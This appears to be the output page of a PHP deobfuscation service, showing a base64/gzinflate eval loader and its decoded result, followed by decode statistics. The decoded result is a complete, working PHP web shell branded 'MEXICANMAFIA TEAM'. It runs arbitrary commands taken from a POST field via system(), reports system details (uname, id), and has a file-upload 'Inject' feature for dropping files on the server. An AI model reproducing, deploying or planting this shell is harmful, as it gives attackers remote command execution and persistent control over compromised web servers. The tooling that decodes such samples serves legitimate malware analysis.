PHP Decode

<?php eval(stripslashes(gzinflate(base64_decode("rVZtb6NGEP5uyf9hTdNLIp1DclKrysZEbkx66OLYA..

Decoded Output

?>
<?php

set_magic_quotes_runtime(0);
print "<body bgcolor=\"#C0C0C0\">";
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>MEXICANMAFIA TEAM</h1></center>";
print "<hr><hr>";

$currentWD  = str_replace("\","\",$_POST['_cwd']);
$currentCMD = str_replace("\","\",$_POST['_cmd']);

$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;
$UptimeOs = `uptime`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

print "<table>";
print "<tr><td><b>My IP:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>uname -a:</b></td><td>$UName</td></tr>";
print "<tr><td><b>ID:</b></td><td>$UserID</td></tr>";
print "<tr><td><b>UPTIME:</b></td><td>$UptimeOs</td></tr>";
print "</table>";

print "<hr><hr>";

if( $_POST['_act'] == "List files!" ) {
    $currentCMD = "ls -la";
}

print "<form method=post enctype=\"multipart/form-data\"><table>";

print "<tr><td><b>CMD:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Shoot!\"></td></tr>";

print "<tr><td><b>PWD:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"ls -al\"></td></tr>";

print "<tr><td><b>Inject:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\"","\"",$currentCMD);
$currentCMD = str_replace("\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print "<center><b>fuckers blocked us try again!</b></center>";
    } else {
        print "<center><pre>";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "</pre><b>File uploaded baby good work!</b></center>";
    }    
} else {
    print "

<!-- OUTPUT STARTS HERE -->
<pre>
";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
    system($currentCMD);
    print "
</pre>
<!-- OUTPUT ENDS HERE -->

</center><hr><hr><center><b>ownd Baby</b></center>";
}

exit;

?>

<?

Original Code


Function Calls

gzinflate 1
stripslashes 1
base64_decode 1

Variables

None

Stats

MD5 6cb212ac0bf13ea527ba4e4ff7dd534e
Eval Count 1
Decode Time 83 ms